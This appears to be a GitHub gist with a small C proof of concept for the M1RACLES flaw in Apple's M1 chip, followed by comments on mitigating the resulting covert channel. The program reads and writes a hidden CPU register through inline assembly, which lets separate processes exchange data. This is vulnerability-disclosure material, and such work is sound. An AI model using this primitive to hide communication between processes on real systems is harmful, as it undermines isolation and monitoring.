/*
 * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
 *
 * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
 *
 * Please visit m1racles.com for more information.
 *
 * Licensed under the MIT license.
 */
#include <inttypes.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    uint64_t val;

    if (argc > 1) {
        /* Write mode: parse the full 64-bit value (atoi would truncate it to an int). */
        val = strtoull(argv[1], NULL, 0);
        /* MSR moves a general-purpose register into the system register. */
        asm volatile("msr s3_5_c15_c10_1, %x0" : : "r"(val));
    } else {
        /* Read mode: MRS moves the system register into a general-purpose register. */
        asm volatile("mrs %x0, s3_5_c15_c10_1" : "=r"(val));
        printf("%" PRIu64 "\n", val);
    }
    return 0;
}

@ubdussamad ubdussamad commented May 27, 2021

Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?

Owner Author

@marcan marcan commented May 27, 2021

> Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?

It can, but adding noise is not an effective mitigation against covert channel communications, as you can always use error correction.


@ubdussamad ubdussamad commented May 27, 2021

I see, but at least it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)

Owner Author

@marcan marcan commented May 27, 2021

> I see, but at least it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)

Proportional to how much time you spend on it. If you peg a CPU core then you could halve the data rate of another CPU core trying to use the channel.


@vedoge vedoge commented Jun 2, 2021

Are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)

Owner Author

@marcan marcan commented Jun 2, 2021

> Are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)

Yes, they are.

https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MSR--register-

https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MRS


@vedoge vedoge commented Jun 7, 2021

Got it. Thanks!
